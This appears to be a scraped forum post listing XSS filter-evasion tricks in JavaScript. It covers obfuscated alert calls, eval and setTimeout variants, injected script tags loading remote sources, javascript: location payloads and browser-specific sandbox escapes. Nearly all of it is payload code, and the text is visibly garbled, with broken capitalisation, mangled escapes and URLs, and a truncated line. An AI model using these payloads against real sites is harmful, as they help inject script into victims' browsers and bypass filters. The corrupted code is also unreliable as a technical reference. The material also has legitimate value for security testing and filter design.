Some alternative usage in javascript

/*
* I will be updating this thread when I have time with the replies .. any mod fell free to help.
*/

// Direct execution

Quote

Window ["alert"] (1); // this ["alert"], self ["alert"], etc .. see references to window

Quote

Self [<> alert </>] (1); // JS1.6 +

Quote

Self [<> <! [CDATA [alert]> </>] (1 );

Quote

Top/**/[x61x6cx65x72x74]/**/(1 );

Quote

U0061lert (1), alertu000a (1 );

Quote

(Ä= #1 ={}& & alert) (ä); // ff only

Quote

Alert. valueOf (). call (self, 1 );

Quote

[Alert. valueOf ()] [0]. valueOf () (1 );

Quote

{X/* @ cc_on = alert @ */} x/* @ (/xss/@ */); // ie only

Quote

({__ NoSuchMethod __: Function}). aaaaa $ dddddddddfffffff _____ ("alert (1)") ()/ff only

Quote

// Ff only
Location. _ noSuchMethod __= location. replace; location ["javascript: alert (1)"] ();
Window. _ noSuchMethod __= setTimeout; window ["alert (2)"] ();

Quote

"" + {ToString: alert} // code execution with no [= ()], doesnt work on FF with native functions

Quote

1 * ({valueOf: alert}) // code execution with no [= ()], doesnt work on FF with native functions

Quote

A setter = alert; a = "hello"; // function execution without [()] ff only

// Evaluate code

Quote

Eval ("alert (1 )");

Quote

SetTimeout ("alert (1 )");

Quote

SetInterval ("alert (1)"); // lots of alerts ..

Quote

Function ("alert (1 )")();

Quote

Self [(typeof prompt). replace (/^./, String. toUpperCase)] ("alert (1 )")();

Quote

[]. Constructor. constructor ('alert (1 )')();

Quote

ExecScript ("alert (1)"); // IE only

Quote

Window [<> eval </>] (name); // JS1.6 +

Quote

'Alert ("xss") '. replace (/. */g, eval)

// Generate/add script tags

Quote

With (document) body. previussibling. appendChild (createElement ('script'). src = 'url'

Quote

With (document) querySelector ('head'). appendChild (createElement ('script'). src = 'url'

Quote

With (a = <script/>) a. @ src = 'url', a. toXMLString (); // FF only, generates the string only (doesn't execute)

Quote

With (document) body. previussibling. appendChild (createElementNS ('HTTP: // www.w3.org/5o/xhtml', html:script'). src = 'url'

// Virtual DOM (execution before appendChild, for escaping sandboxes)

Quote

// IE only
Document. createElement ("html"). appendChild (document. createElement ("script"). text = "alert ('ie sucks ')";
Ddocument. createElement ("html"). appendChild (document. createElement ("script"). setAttribute ('src', // 0x. lv ');

Quote

// WebKit only (Chrome/Safari)
Document. createElementNS ("http://www.w3.org/5o/xhtml#, ”html "). innerHTML = '

Quote

// FF only
Document. createElement ("pre"). innerHTML = " ";
With (new Image) setAttribute ('onerror', alert (1) '), src = '.;
With (document. createElement ("img") setAttribute ('onerror', alert (1) '), setAttribute ('src ','.');
New Option (). innerHTML = " "; // tip: [new Option] [0] [name] = location. hash // name = innerHTML location. hash =

Quote

// Opera only
New Image (). src = "javascript: alert (1234 )";
Document. createElement ('img '). src = "javascript: alert (1234 )";

// Location

Quote

Location = 'javascript: alert (1 )';

Quote

Location. assign ('javascript: alert (1 )');

Quote

Location. replace ('javascript: alert (1 )');

Quote

// Supossing the url is http: // victim/asdf/# % 0 aalert (1) (ie only)
Location. protocol = 'javascript ';

Quote

Document. URL = 'javascript: alert (1) '; // ie

Quote

Location = Namespace ('javascript: x61lert (1) '). uri // ff

Quote

FrameElement. src = 'javascript: alert (1) ';/* requires to be framed in same origin (frame a page with a frame and do frames [0]. frames [0]. location = "xss victim ")*/

// Etc ..

Quote

<Meta http-equiv = refresh content},url?xss.swf>

Quote

Document.styleSheets(0).css Text = name; // IE only

-----------
Http://sirdarckcat.blogspot.com/http://www.sirdarckcat.net/http://foro.elhacker.net/http://twitter.com/sirdarckcat